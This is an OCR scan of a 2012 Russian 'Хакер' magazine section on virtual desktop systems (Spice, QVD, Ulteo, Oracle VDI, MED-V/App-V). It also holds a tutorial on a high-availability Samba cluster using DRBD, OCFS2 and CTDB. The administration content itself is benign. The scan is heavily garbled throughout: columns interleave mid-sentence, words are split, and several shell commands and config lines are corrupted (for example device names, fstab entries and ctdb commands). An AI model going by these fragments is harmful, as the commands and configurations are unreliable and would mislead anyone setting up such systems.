тpdiyrra~, уц_.,.~Фмхоо< 'Нetcnoiii>)084t ь810NТII'IКq'IO~·.

fcno Amt~'"lt(l'"ol>noJyrr(.A ~~ pnoete!lttCIJ8 YJI~~CТO/IOII,TOtteOfii<041-IIII'I"*fVVIIIIКТtiOOI1ЪI<S ~ое ~ ~в~.

г

OLJ.-.LIT'тl V 1R1 U Rl

Мастер настройки виртуальных рабочих столов

Подключ е ние к удаленному рабочему столу

О

ES

К

www.epidemz.net

О Р

OVD

ХАКЕР

118

1

04 /1 59/20 12


Н овая эра т е рминальных систем

[

Logiп

("

Password гedeпtials

se local

Ulteo

D. .

'-'-'

о 1

О Yes @ N o

Fнllscгeen

~1

~ 1 English (U S)

Langнage

Keyboard

1

[ Desktop ~

Mode

0:::'

layoнt

Advanced settings

Веб-клиент

О Yes @

1 English

J

~1

(US)

L§.Jinect

J

Ulteo

$ qemu-k vm -s pice

port=1234,disaЬle-ticketing

Демон должен запуститься автоматически, в противном случае

-hda / п уть/ до/образа/ дис ка

стартуем его самостоятельно:

2. На стороне клиента:

$ su do /etc/ i ni t .d/libvirtd start

$ sudo apt-get install spice-c l ient $ spicec -h loca lhost - р 1234

Теперь идем на машину с икса ми, ставим virt-manager и подключа­

Для тестирования этого вполне достаточно, но для развертыва ­

$ sud o apt-get install v irt - manager $ v i rt -manager - с qemu + ss h: //root@se rv er .com /sys tem

емсяк libvirtd:

ния сети с десятком -д ругим клиентов, работающих с разными

ОС, гораздо удобнее воспользоваться графическим менеджером виртуальных машин viгt - maпageг. Я не призываю устанавливать на

Нажав на кнопку «Новая>>, создаем новую виртуальную ма­

сервер иксы, потому как viгt-manageг может работать и удаленно,

шину с нужными опциями, про изводим установку ОС, тестируем.

посылая команды демону libvirtd по ssh. Итак, ставим на сервер qemu, libvirt и демон libvi r td :

Если имеем дело с UNIX, обязательно устанавливаем видеодрай ­ вер для Spice-cepвepa xorg-video - qxl, без него большая часть

оптимизаций не будет работать. Д алее выключаем виртуальную машину, выбираем пункт меню «Вид-> П одробности>>, нажимаем

$ sudo apt - get install bri dge -utils dnsma sq \

<< Добавить оборудование>>, выбираем пункт <<Grap hics>>, в поле

kvm qemu l ib v irt libv i rt -bin

<<Тип>> указываем <<Spice server>>, указываем нужный номер п орта

ТЕХНОЛОГИИ

MED-V

И

APP-V

Н е редко в организациях можно встретить приложе н ия , работающие

Внешн е такое приложен и е работает какобычно е [его ви д но в мене д жере

только под Win X P-пepeнoc и х под новы е Wi п 7 или Vista неваэмаж е н ил и

задач), но выполняется в особой виртуальной среде. По сути, Арр-V- з то

нецелесообразен . Даунгрейд ОС также неприемлем, самая банальная

у добно е сре д ство доставки прилож е ний, работающи х в родной среде

причина- нет драйверов под новый ноутбук. Д ержать отдельный

(в отличиест М ED-V), нетр ебу ющее выделен и я подни хо тдельного П К или

ком п лишь для одной древней проги тоже н е выход . Технология MED-

подключ е ния к терминальномусервису. Назначен и ем приложений можно

V (Microsoft Enterprise Desktop Viгtualization , clck .ru/WQgT I является неким аналогом реализации VDI, но на клие н тской сторо н е. Одной и з основных ее частей является всем известный ХР Mode, позволяющи й за пускатьви рту ал ьную ОС (Wi nXP!Vistal в специальной peдaкцииV i rtual

управлятьпри помощи гр у пповы х полити к , такжепросто и у братьдоступ ,

РС. При этом nользователь даже н е за метит << п одмены >>, - в место о к на

возможностями MED-V, необ хо димо ус тановить MDOP (Desktop Optimization Pack, пакет со д ерж ит еще ряд поле з ны х решений) . Если с истем, требующих MED-V, очень много , понадобится р аз вертывани е специального сервера у правления , х отя MED-V 2.0 и App-V инт е грир у ются с System Center Coпfiguration Manageг.

виртуальной машины о н будет работать с <<обычным>> приложени ем, за пу скае мым через меню << Пуск >>.

Тех н о л о г и я Ар р- V (М i с rosoft Ар р 1i cati оn Vi г tu а 1i z а t i оn 1да е т воз м о ж н ость пр еоб разовать обычные приложения в вир т уальные, причем

не у даляя его фи зи че ски.

Данные те хно логии н е дост у пны для Win7 Home / Starter и не в хо дят в стандартную поставку. Чтобы воспользоваться

пользователю не нужно их п еред этим устанавлива т ь и настраивать.

ХАКЕР

04/159/2012

119

www.epidemz.net


SYN/ACK

мыши на виртуальной машине-> Clone >> l и немного изменить на­

SPICE

ПОЗВОЛЯЕТ ПРОБРАСЫВАТЬ

стройки каждой из них. Само собой разумеется, что при количестве клиентов, превышающем

10-15,

одним сервером не обойтись,

nоэтому в viгt-manageг есть возможность управления виртуаль­

ПО СЕТИ НЕ ТОЛЬКО ИЗОБРА­

ными машинами на нескольких серверах [<<Файл

-

-1

Добавить

соединение>>].

ЖЕНИЕ РАБОЧЕГО СТОЛА, НО И

УСТРОЙСТВА ВВОДА, USВ ~ ПОРТЫ,

Проект QVD [Quality Viгtual Desktop, thegvd .com ] nредставляет

собой масштабируемое, эффективное и nростое в управлении

АУДИОПОТОК

VDI

с открытым исходным кодом, nостроенное на базе GNU/Linux и по­ зво ляющее запускать

VM

с одного или нескольких образов ОС на

одном узле. Основным направлением развития проекта является и пароль. Если был установлен драйвер

обеспечение дост упа к

«Видео>> и в поле <<Модель>> выбираем

лей и минимизация потребления ресурсов для каждой сессии. Ша­

на готова к удаленному подключению

qxl, переходим в раздел qxl. Все , виртуальная маши­ по протоколу Spice. Теперь

VDI

как можно большего числа nользовате­

блонный образ ОС может быть использован несколькими

что

VDI,

нужно настроить тонкие клиенты так, чтобы они автоматически

позволяет стандартизировать рабочую среду и уnростить уnрав­

цеплялись к Spice-cepвepy после загрузки. Для этого устанавли­

ление. Состояние VD записывается в отдельный образ [oveгlays],

ваем на клиенты любой

который по окончании работы может уничтожаться [no умолчанию]

Linux

дистрибутив, содержащий Х-сервер

из коробки. После установки создаем беспарольного пользователя

или сохраняться. Во втором варианте nри следующем подключе­

с любым именем и прописываем ему в автозагрузку следующую

нии клиент сразу продолжит работу с того же места. В настоящее

команду:

время проект предлагает клиенты для

Windows

и

Linux,

на подходе

версия для Andгo i d.

spicec -f -h

адрес_сервера

-р н омер_n орта

-w

В настоящее время

nараль

QVD

считается надежной и безоnасной сре­

дой и используется во многих организациях, в том числе благодаря

Ее можно поместить либо в файл -/.xsession пользователя ,

быстрой окупаемости вложений [Retuгn on lnvestment, ROI]. Напри­

сразу после слова <<ехес>>, либо в скрипт внутри каталога - /.config/

мер, е го выбрал крупнейший банк Мексики

autostaгt, чтобы его подхватывала среда рабочего стола. В любом

Основой QVD является технология KVM [Keгnel Viгtual Machine],

BBVA

Bancomeг.

случае послелогинаnользователя будет стартовать Sрiсе-клиент

клиент для доступа использует протокол

на nолный экран и устанавливать соединение с виртуальн ой

за щищенное и стабильное соединение при низкоскоростных под­

машиной. Чтобы nользователю не приходилось два раза входить

ключениях. Авторизация пользователя возможна средствами

[сначала в реальную машину, затем- в виртуальную], лучше на­

обеспечивающий

NX,

LDAP.

Функционально система состоит из трех компонентов: одного

или нескольких QVD-cepвepoв, сервера управления и сервера

строить автологин.

Для каждого терминала можно создать собственную виртуаль­ ную машину, указывая разные порты и парали

Spice

P ostgгe SQL. Чтобы обеспечить максимальную производитель-

в настр ойках.

ность и масштабируемость, они должны располагаться на разных

Сделать это с помощью viгt-manageг очень просто. Достаточн о

машинах. Разработчиками сообщается, что

создать нужное число клонов виртуальной машины [<<правый клик

предприятии для обслуживания более

Storaqe "'

QEMU VM

Графика

N•twork

lnput

Guest

Укажите настройки nро с мотра виртуа11ьного жрана. Iиn:

qxl driver

1

1

standaгd

guest dгivers

1

·1

Sp1ce server

Sound

1

QVD был развернут на 35 000 пользователей и обра-

Tlpr VNC or Splce server ls strono~ recommended bec"u se lt

Serial

ellowsthe\(jгtueldlspliiiYtobeembeddedln.s l dethlsoppllcetJon. lt

Parallel

ml)'elsobe usedto aHow rtmotesystem.

Channel USB Host Devic e PCI Host DevJCe

Video

tccesstotheviгtulll

dlspleyfrome

Адр2с: О Прослуwивап. все общедостуnные сетевые интерфейсы

Qорт : !s900

j·j !LS port : js901j:j

О А§.томати'iеское на:~на'iение

Пароаь :

fаскладка :

0

Как на хосте

gругая :

user's machine

М еха н изм до с ту п а

Spi ce

ХАКЕР

120

www.epidemz.net

04/159/2012


Новая э ра терминальных систем

•О настройке

ULTEO OPEN VIRTUAL DESKTOP (OVD)

сервера терминалов

в

Win2k8 09.08;

чит ай в][

•по дробне е о Нурег­

Платформа OVD lulteo.coml от Га эля Дюваля, создателя

данными идет по RDP ITCP/3389 1. В текущей редакции

Mandгake/Mandгiva Linux, nозволяет организовать достуn

пользователь может без проблем воспроизводить аудио-

nри nомощи В'еб-браузера или специального клиента

и видеофайлы из домашни х каталогов, размещенных на

к рабочим столам или отдельным приложениям на базе

удаленных системах . Поддерживается более двадцати

Liпux или

языков, в том числе и рус с кий. Серв ерная часть платформы

Windows . При этом пользователь подключается

к своему рабочему месту с любого ПК, на котором установлен браузер с

Java

пл аги н о м. Решение совместимо с некоторыми

облачными системами вроде

найдешь обзор VMwaгe

на Ubuntu 10.04 LTS, RHEL 5.5[неофициально CentOS и Fe-

с ерв е ра приложений, файлового сервера и шлюза. Первые

базе

динамический/ виртуальный IР-адр ес каждому сеанс у или

Ubuntu. Сегодня Ulteo активно развивается и зарекомендовал

два являются основными. Аутентификация пользователя

nриложению , что

решает проблему привязки к IP;

себя стабильным продуктом, используется в гассекторе

новой ветки

3.0 . Для

View 4.5; Win 2k8 R2 RDS

•в

умеет назначать

приложенийl . Доступен и уста но вочный DVD, построенный на

RC8

виртуальность»,][

02.09; •в ][ 11.10ты

поддерживает установку [через специальный репозиторийl

с остоит из нескольких компонентов : менеджера сессий ,

во з можна средствами LDAP/AD и CAS.

в статье

«Гиперактив на я

doгal, Novell SLES 11 SP1, Win2k3/2k8/R2 [только сер вер

Amazon ЕС2. Структурно OVD

В настоящее время доступен

V читай

•технологии VDI не

и образова нии, небольши х и с редни х пр е дприятия х, а также

организации подключения к удаленным рабочим столам

некоторыми хостин говыми ком паниями , предоставляющими

и с пользуется защищенный протокол HTTPS/443, обмен

услуги удаленного доступа.

TS/RDS

и

взаимоисключают,

а ДОПОЛНЯЮТ друг друга ;

• в настоящее время QVD используется в крупнейшем банке Мексики BBVA Bancom er.

ORACLEVDI Те х нология, являющаяся частью Огасlе Viгtualizatioп- набора

защиты [на локальной машине не сохра ня ется никакая

с ред с тв виртуализации, который призван покрывать все

лишняя информация-

потребности организаций от терминалов [вроде Sun Rayl до ЦОД

К слову, менеджер админис триров ания

ISun Fiгe, Sun Stoгagel. Огасlе VDI пред став ля ет собой менеджер

на

cookie, кэш, авторизация и так далее] . VDI также написан собой веб-приложение. Режим <<kiosk

сессий- соппесtiоп Ьгоkег- обеспечивающий подключение

Java и представляет mode >> позволяет работать

клиентов к виртуальным рабочим местам по пр отоколам

режиме без возможности доступа к самой ОС. Те хнология

RDP или SGD IOгacle Secuгe Global Desktopl . В качестве

Аг г а у

автоматиче с ки переключает соединени е н а с ледующий

ViгtuaiBox , VMwaгe vSpheгe, Нурег-V, а также отдельные ПК,

сервер в массиве. Пользователи могут им е ть переанальные

предоставляющие доступ по

десктопы или работать с пулом, подключ а ть с менные носители ,

Приложения могут работать

под управлением любой популярной ОС

[Windows , Solaгis ,

и VDI: clck . гJ!LWddP; •caйтQVD:

~-

с прило же ни ем в полноэкранном

виртуальных машин [Viгtua li zatioп Layeгl могут выступать

RDP.

•Набор руководств от Microsoft по развертыванию RDS

Resilience в случае не доступности ос новного сервера

Для возможности удаленного подключения к сессии клиентов

н еобхо димо в ветке реестра

воспроизводить качественное видео и аудио , получить

Liпux, *пiх и др]. В случае выбора SGD пользователь запускает

32-битный цвет и так далее . Индивидуальные параметры

в браузере специальный веб-клиент, обеспечивающий доступ

подключений можно хранить в атрибутах AD/LDAP. В качес т ве

к д ан ным с любого устройства [браузер, поддерживающий

базовой платформы исполь з у е тся So l aгis или Огасlе Епtегргisе

Java[RR1]J, шифрование сеанса и допол нитель ный уровень

Linux [клон RHELI.

HKEY_LOCAL_

M ACНINE \SYSTEM\Cur­

rentControlSet\Con trol \TerminalServer установ ить значение

nараметра

moteRPC

AllowRe -

в н 1~>.

ботки д о 9 000 од н о вр е м е н ных сесс ий , прич ем ус п е шн о с пр авл ялся

После об н овлени я в с п иске появи т с я н еск олько па к е т о в

с р а бо т о й. С е р вер у прав ления обес п е чив ае т п о дкл ю ч е ни е к ли ен т ов,

уnро щ ения изучени я разработчик и пр е дл агают с пе ц иаль н ы й м е т а­

за п ус к ну жной

паке т, устанавливающий в с е компо ненты на од ин сер вер :

VM и по лучен и е ви рт у альног о IP. Со с т о ит и з трех

qvd-*- Дл я

ко мп о н е нтов :' броке ра с оед инений L7R , д е мона HKD [Hous e Kee ping

Dae monl, отве чаю щ е го за п у ск/остан ов VM и связь с БД, и Node -эле м ента управле н ия L7R и HKD . Д ля хра н ения данных исполь­

$ sudo apt- get inst al l \ qvd- demo- sing l e- in sta nce- no suppo rt qvd - admin

з уе т с я любой NAS/SA N ресурс. Управле н ие и монитори н г рабо т ы производятся при помощи веб-интерфейса QV D Web Administгation Tool [WAT, написан на Регl Catalyst l или из ко н соли [qvd-admiп l . Д осту п но н ескол ь ко ве р сий QVD- свобо д н ы й Community, плат­ ный Commeгcial и сервис Clo ud [ н а хостин г е QVD] . С р авнение их

Теперь можно подключаться к WAT, который по умолчанию рабо­

функц и она льн ост и мо ж н о н а й т и на сайте.

л агают неско льк о в а р и ан т ов, в т о м ч и сле и индив и ду а льные]. Вс е

П роект п р е д остав л яе т репозиторий па кетов для Ub untu 10.04

LTS и SL ES, а также де м ообразы для виртуальных машин [на базе Ubuntu 10.10 ]. Н о разработч и ки отме ч ают, ч т о уста н овить QVD при помощи исходных текстов мо жн о на л юбом Linux. В Ubuntu 10.04 LTS п р оцесс выгл яди т д оволь н о просто, вна ча ле сле д уе т добавить информаци ю о но в ом ре п ози т ор ии :

та е т на 3000 порту, и приступать к настройкам. Чтобы упростить установку, из по ст авк и уб р ан ы все о б ра з ы О С , п оэ т о му и х п р и­

дется << готовить>> самостояте л ьно [за п лату разра б о тчик и пр е д ­ образ ы хра н я т с я в ч е т ырех п о дк а та логах /vaг/li Ь/qv d /sto гa ge [е г о обычно монтируют чере з NFS]: homes [qcow2 изображения поль­ зовательско г о / home l, i mages [О С] , oveгl a ys [вре м ен ны е фа й лы] и stagiпg.

ЗАКЛЮЧЕНИЕ Как ты мо г убе д и т ься, идея терминалов и единого вычисл и тельного

$ s udo apt- add -re pos ito r y \

центра продолжает жить и процветать, заставляя программ истов

'deb http: // theq v d.com/ debi an lucid main' $ sud o apt- get updat e

и админов выдумывать все более изощ р енные методы связи, удо­

ХАКЕР

влетворяющие потребнос т ям сего д ня ш него дня.

04/159/ 201 2

I

121

www.epidemz.net


SYN/ACK

Евгений Зо бнин izobninlagmail.coml

НЕИЗМЕННО ВЫСОКАЯ

н РАЗВОРАЧИВАЕМ

Каждая организация в той или иной мере

ОТКАЗОУСТОЙЧИВЫЙ СЕРВИС ХРАНЕНИЯ ДАННЫХ НА БАЗЕ

SAMBA

ь

нуждается в быстром и надежном сервисе хра нения данных. В большинстве слу ча ев эта за дача решается с помощью покупки разного

рода оборудования, реализующего

NAS, однако

создать высокопроизводительный и устойчивый к сбоям файловый сервис можно и на базе парочки стареньких серверов, оснащенны х до стато чно емкими дисками.

122

ХАКЕР 04/159/2012

www.epidemz.net


Н еизме нн о высо к а я д ос т у пн ос т ь

o !J= •

о «>nfigцring

о

о

о

w\kJ.samЬ ...org

J<>Jing

· ~

c tdb

huiliJing

С

· ~

sоп-.Ьо

dщume n tatjon

!wg,Jrocking

page

S 'AmBA

d1scuss1on

hislory

CTDB Project Conte nts [hlde)

Welcome to the CTDB web pages

1 CTDB Project 1 1 ProJect Members

CTDB is а c\uster implementation ofthe TDB database шеd Ьу Samba !nd otbe,pгojects to stшe temporary data. J faп application is a\ready using ТDВ for temporaty data it is very easy to convert that applicatioп to Ье c\uster a\vare and use CTDB

navigatlon

1 2 Settlng Up CTDB

• Maln page

1.3 Status Updates

• Communtty porta!

instead.

Curтent

1 4 Projecl Outltne

events

2 ProJecl Tasks

• Recent changes

2.1 Hardware acceleration 2.1. 1 The basic features we want from

• Random page

CTDB

pгovides

pi"ovidiпg а

the same types offtщctioпs as TDB but in а c\ustet·ed fasltion , ffiB-style database ti1Зt spaпs multiple pl1ys icallюsts in а clustet·.

• Help

а

messaging API are:

2.1 2 TODOs regardmg this interface

22 CTDB API

search

2 3 Code s3/s4 databases ontop of ctdb api

Fearut·es inclttde: Go

• CTDB provides а TDB tl1at has consi s teпt data and consistent locking across all nodes in а clttster. о СТDВ is very fast. • In case ofпode failнгes, CTDB \vi\1 automatical1y recover апd repait· al\ ТDВ databases tlшt it maпages. С т р а ни ч ки, посвященные проекту

2.4 Code cltent CTDB api оп top of dumb tdb

Search

2 5 Prototype CTDB library on top of

toolbox

СТОВ

• What lmks here

2.7 Code

• Related changes

2 В Recovery

• Speciэl pages

2 9 IP Takeover

Prtn taЫe

UDPIТCP

2.6 Setup slandalone test envtronment

version

test suite

2 .10 Work out details for persistent tdbs

CTDB

I:J:Ii!I§ЩI!i

Итого для настройки высоконадежного файлово г о сервиса

В этой статье мы рассмот р им процесс создания высоконадежно­ го файлового хранилища, реализованного на безе двух типичных

Samba нам необходимо следующее. 1. Обзавестись двумя серверами, в каждом

серверов, операцион н ой сис т емы GNU/ Linux и сервера Samba. Мы создадим небольшой, но устойчивый к сбоям кластер: вы­ ход одного из узлов из строя никак не повлияет на достуnность данных.

..,.,,,61 В обычной ситуации файловый сервис на основе

Samba

2. 3. 4. 5.

Linux

Настроитьсетевой

RAID1

между ними.

Поднять параллельн у ю ФС на RА101-массиве. Установить и настроить на каждом узле Поднять

CTDB для демонами Samba.

Samba.

расшаривания данных о состоянии между

выглядит Такой вот многослойный nирог, приготовлением которого мы и

как машина, оснащенная достаточно емким жестким диском, на

которую установлен дистрибутив

из которых установлено

два диска и две сетевые карты.

и nакет nрограмм

Samba ,

отвечающих за обслуживание клиентских заnросов на достуn к ресурсам. И зъян такой конфи г урации в том, что выход из строя

займемся nрямо се й час.

НАСТРОЙКА ХРАНИЛИЩА

жесткого диска моментально обруши т весь сервис и оставит кли­

Итак, у нас есть два сервера, каждый из которых осна щ ен д вумя

ентов без хранилища дан н ых.

жесткими дисками. На / dev/sda стоит операцион н ая система

Понятно, что для решения этой nроблемы следует в обяза­

! я буду использовать Debian), / dev/sdb отведен для хранения

тельном порядке применять RА1 0 1 - массив, который позволит

данных

сохранить данные и работоспособность сервиса, даже если один из

конфигурация будет менее nроизведительной и удоб н ой в сопро­

дисков умрет. Это типи чн ая конфигурация, которая, тем не менее,

вождении.

Чтобы избежать и этой ситуа ц ии, можно собрать мини-кластер

Можно исnользовать и один диск, но такая

Наша первоочередная задача- объединить жест к ие диски

не спасет от смерти са м ого се рв ера или одной из его железяк. В этом случае данные все равно окажутся недоступны.

Samba.

двух машин в массив

RA ID1.

щью драйвера

и кроссовер-кабеля, соединяющего серверы

DRBD

Сделать это по сети можно с nомо­

из нескольких машин, данные с жестких дисков ко т орых будут

напрямую через одну из двух сетевых карт. Это позволит создать

зеркалироваться по сети с nомощью драйвера

мост для быстрого обмена данными между машинами, в то время

DRB D и

сnециаль­

ной nараллельной файловой системы. Н о и здесь есть загвоздка:

как клиенты будут получать доступ к кластеру с помо щ ью д ру г ого,

если мы n рос т о установ и м на оба этих узла

внешнего сетевого интерфейса.

Samba,

то легко nо­

Чтобы не путаться, сразу оnределимся, что

лучим несогласованность файловой системы, видимой удаленным

Для отображения семантики файловой системы

UN IX в CIFS Samba ис n ользуе т легковесные базы данных, называем ы е TD B, которые содержат такие данные как таблица соответствия Windows 510 и Unix UID/G ID, дан н ые и nоддержки своего состояния

Samba

и

10.0.0.2

щью кроссовер - кабеля, а

будут работать с одним общим хранилищем, но

иметь разные таблицы

TDB,

192.168.0.1

и

192.168.0.2 -

это внешние

адреса , по которым будет происходить обмен сервисными данными

и которые будут видны клиентам !на самом деле все несколько сложнее, но об э т ом позже).

об о т крытых сессиях, таб л ицу блокировок и так далее. Если два экземпляра

10.0.0.1

- это внутренние IР-адреса, объединяющие серверы с помо-

nользователям.

После настройки IР-адресов выполняем на каждой машине следующую команду:

это nриведет к весьма печальным по­

#

следствиям с первых же минут заnуска сервиса.

apt-get i nsta ll drbd8-utils

Но и этой проблемы можно избежать, восnользовавшись демо­

ном CTD B !Ciusteг TDBI, который будет храни т ь еди н ую базу д ан н ых для нескольких экземпляров

Samba

и с л едить за ее соответств и ем

реальному положению дел. В качестве бонуса

CTDB также будет

выполнять функции мониторинга и автоматического отключения

нерабочих узлов от кластера, что избавит нас от необходимости ис­ пользования сторонних инструментов.

ХАКЕР

Далее на одной из машин создаем файл /etc/drbd.conf и пишем в него следующее:

# vi /etc / dr bd . conf globa l { usage-co unt no; } commo n { sy nce r { rate 100М ; } }

123

04/159/2012

www.epidemz.net


SYN/ACK

s

s

ТСР / 1

TCP/IP

NI C

Как работает

DRBD

resource r0 { protocol С; startup { wfc-timeout 15 ; degr-wfc-timeout 60 ;

device /dev/drbd0; disk /dev/sdb ; address 10.0 . 0 . 2 :7788 ; meta-disk internal;

net Настройки двухголовой конфигурации (primary/ primary) allow-two-pr imaries; after-sb- 0pri discard-zero-changes; after-sb- 1pri co nsensus; after-sb- 2pri disconnect;

Главное здесь- это nа роль, используемый для доступа к

#

массиву, а также два последних блока, описывающих диски

массива. Они могут иметь произвольные имена, однако поля должны содержать актуальные данные для каждого из хостов.

Опция

«disk>>

задает блочное устройство, которое станет частью

# Пароль и метод шифрования

массива, опция «addгess>>- внутренний IР-адрес узла и порт

shared-secret "ПАРОЛЬ" ; cram-h mac-alg s ha1;

ном виде.

DRDB.

Файл необходимо скопировать на второй узел в неизмен­

Теперь инициализируем массив, выполнив на обоих узлах

# П\'РВЫЙ узел

команду:

on node1 { device /dev/drbd0; disk /dev/sdb; address 10 . 0 . 0.1 :7788 ; meta-disk internal;

#

Далее стартуем сервис dгbd [опять же на обоих узлах]:

# #

drbdadm create-md r0

/etc/in it.d /drbd start

Второй узел

on node2 {

На одном из узлов выполняем следующую команду, которая

сделает оба узла главными, то есть позволит монтировать DRВD­ девайс с обеих н од:

СОБИРАЕМ МИНИ-КЛАСТЕР ИЗ

#

drbdsetup /dev/drbd0 primary

После этого должна начаться синхронизация, за ходом которой

НЕСКОЛЬКИХ МАШИН, ДАННЫЕ С

можно следить, читая файл /ргос/dгЬd:

ЖЕСТКИХ ДИСКОВ КОТОРЫХ БУДУТ

#

ЗЕРКАЛИРОВАТЬСЯ ПО СЕТИ

cat /proc/drbd После окончания синхронизации на массиве можно создать

12~

ХАКЕР

www.epidemz.net

04/159/2012


Н е и з м е нн о в ы со кая до с т у пн ос ть

Далее ФС можно смонтировать [здесь и далее я буду испол ь зо­

файловую систему. Ст андартная ФС не подойдет, так как не сможет обеспечить соответствие мета д анных nри о д новременном доступе

вать каталог

к ФС с разных узлов. П оэтому нам нужна параллельная файловая

Samba/:

/samba

в качестве точки монтирования и корня для

система [ т акже называемая кластерной/, на роль ко т орой отлично nодойдет

OC F52 от Огас l е [хотя можно использовать и любую дру­ GF52/. OCFS2 есть в ядре, поэтому все, что требуется установить,

гую, например Код

# # #

mkd ir /sa mba ec ho "/dev/ drbde /sa mba ocf s2 no at ime mou nt / dev/d rbde

е е·

>> /et c/f st ab

это утилиты у~равления:

Сделать это необходимо на обоих узлах . Чтобы избежать воз­

#

можных nроблем в будущем, проверь работоспособнос т ь кластера

apt-get in sta ll ocfs2- t ools

и корректность настроек с помощью копирования ф айлов и ката­

Конфи г файловой системы хранится в /etc/ocfs2/clusteг.conf. В нашей ко н фигурации он должен иметь nример н о следующий

логов в файловую систему. При правильной настройке содержимое ФС должно выглядеть идентично на обоих узлах.

вид:

ЗАПУСК

SAMBA

Если в работе файловой системы не возникает проблем, то можно

vi / etc / ocfs2/cluster.conf cluster : node_cou nt = 2 name = ocfs2

#

переходить к установке и настройке

Samba.

Главное здесь, как я

уже говорил, демон СТDВ, nоэтому мы остановимся на очень про­ стом конфиге

Samba,

а ее кластерную составляющую расс м отр и м

более подробно.

node :

Итак, наш конфиг

ip_port = 7777 ip_ad dr ess = 1 92. 1 68.е. 1 nu mber = 1 name = node1 . cl us ter. l oca l clu st er = ocfs 2

Samba

будет выглядеть примерно так:

[global] clustering = yes idmap bac kend = t db 2 private dir=/samba/ctdb fileid:mapping = fsid vfs objects = fileid

node : i p_port = 7777 i p_addr ess = 1 92 . 168 . е .2 number = 2 name = nod e2. clu st e r . l oc al clu ste r = ocf s2

[ p uЬlic]

Этот конфиг описывает класте р с именем

ocfs2

и двумя н одами:

comment = puЫic share path = /sa m ba/puЬlic puЫic = yes writeaЬle = yes only guest = yes

node1.clusteг.local и node2.cl u s t e г. local. И мена н о д должны совпадать

Это простейший пример файла

с именами хостов, поэтому необходим о за р анее позаботиться о при­

вязке имен хостов к IР -а д ресам в файле

/etc/hosts обоих узлов.

Имя

кластера меня т ь не стоит, так как загрузочные с крипты п о умолчанию

будут инициализировать клас т ер

<<ocfs2»

и не смогут завершить этот

/etc/samba/smb.co nf с о дн о й п у­ /samba/ct db для хра­

бличной <<шарой», а также приватным каталогом нения данных демона

CTDB. Фактически, только

первые три строки

необходимы для работы самбы в кластерном варианте, остальное­

процесс, если имя будет другим . О брати внимание, что в этот раз мы

nросто оптимизация для работы с

используем вн ешние I Р- а д реса .

Каталоги, естественно, необходимо создать заранее:

OCFS2

и описание сете в ого диска.

Копируем конфиг на оба узла и заnускаем службу о2сЬ:

#

# # #

/et c/ init . d/o2cb sta rt

mkdi r /sa mba /c t db mkdir /sam b a/ pu Ыic ch mod 777 /sa m ba/puЬlic

Теперь можно создать файловую систему на DRВО-устройстве.

Сделать это можно с любого узла:

#

Инициализируем базу па ролей:

mk fs .ocfs2 - L "ocfs 2" / dev / dr bde

#

Производительность Рез ульт а т т еста

NB ENCH CIFS для малого

Узлы

кпа с тера из четыре х узлов

(lntel dua l-core IBM HS2 1) и не б ольшо й с и с темы х ранения

GPFS

1 2 3 4

до

CTDB (MB/s)

95 .0 2.1 1.8 1.8

с

CTDB (MB/s)

109 210 278 308

Производительность С ТОВ- к ластера раст е т nроnорционально к олич е с т в у уз ло в

ХАКЕР

root

> ct db s tatus

<?_se,;:

на о с нове

smbpasswd

Numbe r of nodes :2 pnn :0 192 .168,0,1 ОК (THIS NODE ) pn n : 1 192 , 168 ,0 ,2 ОК Generation : 1362679229 Size :2 hash :0 lmaster :0 hash : 1 lmaster : 1 Reco very mode :NORHRL (0 ) Reco ver y master :0 П рове р я е м состоя ни е к ласт е р а

125

04/159/2012

www.epidemz.net


SYN/ACK

Далее устанавливаем самбу на оба узла и копируем на них вышеприведенный конфиг. В качестве окончательного штриха

устанавливаем и настраиваем CTDB на обоих узлах:

# apt-get

iп sta ll

ct db

Сам демон не имеет конфигурационного файла, н о, тем не

pnn:1 192.1 68 .0 .2 ОК Ge nera ti o n : 1362679229 Size:2 has h:0 lma ste r :0 has h : 1 lma ste r : 1 Recove ry mode :NORMA L (0) Recovery ma st er :0

менее, требует настройки с помощью скриптое инициализации

и закрепленных за ними конфигов. В Fedoгa/RedHat это /etc/ syscoпfig/ctdb, в Debiaп/Ubuпtu - /etc/default/ctdb. Файл необходи­

Также для проверкисоединения можно устроить пинг СТОВ­ хостов:

мо отредактировать на обоих узлах:

#

Местонахождение lосk-файла мастера

восстановления

CТ DB_RECOV ERY_L OCK; " / samba /c tdb / lock"

# Публичный сетевой интерфейс, # обмена данными CTDB_PU BLIC_I NTERF ACE ; eth 0

#

Список адресов,

# ctdb pi ng -n al l res p oпse from 0 t i me;0,000064 sec response from 1 time;0.000087 sec

(3 cl ien ts) (9 c l ients)

используемый для

Наконец запускаем демон Samba:

по которым будет доступен кластер

# /etc/in i t. d/sa mb a start

C TDB _PUBLIC_ADDRESSES ;/e tc /ct d b/ puЬl ic_a d dresses

# Перекладываем работу CTDB_MANAGE S_SAMBA;yes

по запуску

Samba

на

CTDB

Если при конфигурировании не было до п ущено ошибок, кла­ стер уже должен быть готов к подключению клиентов. Со стороны Windоws-клиентов кластер должен выгляде т ь как единое целое, то

# Список СТОВ-узлов CTDB_NOD ES;/etc/ctd b/nodes

есть как один сервер хранения . В большинстве сред рабочего сто­ ла для UNIX картина будет та же. Однако если потребуется смон­

# Куда писать логи CTDB_ LOG FI LE;/va r / l og/log . ctdb

тировать «диск>> из командной строки, придется указать один из

публичных IР-адресов, прописанных в /etc/ctdb/puЫic_addгesses: Далее создаем файл /etc/ctdЬ/пodes и добавляем в него IР­ адреса узлов Samba, то есть наши два сервера:

# mount -t ci fs /mпt/sam b a

# smbcl i ent

192. 168.0. 1/2 4 192. 168.0.2/24

//192. 1 68 . 0.3/ pu Ы i c -о

user;IOЗ EP

// 1 92. 1 68 . 0 .4 /p uЬlic

Не важно, какой из адресов использова ть , - как я уже говорил,

Также создаем файл /etc/ctdЬ/puЫic_addгesses с еще двумя

они оба будут доступны ровно до тех пор, пок а в строю будет на­

IР-адресами:

ходиться хотя бы один сервер.

192. 168.0.3/24 192. 168 .0.4/ 24

Просто собрать кластер - только начало, гораз д о труднее зани­

МОНИТОРИНГ И ВОССТАНОВЛЕНИЕ маться слежением за его состоя н ием и предотвращать отказы.

Эти адреса должны отличаться от публичных адресов, но на­

К счастью, наша конфигурация всячески этому способствует и

ходиться в той же подсе т и. Они будут автоматически назначены

требует вмеша т ельства, как правило, только на уровне реше­

узлам кластера в качестве дополнительных IР-адресов, по кото­

ния железных проблем,- остальные проблемы будут решены

рым и будет происхо д и т ь по д ключение клиентов. Это нужно для

софтом самостоятельно. Как это работает? П редставим себе

автоматического поддержания работоспособности кластера. Е сли

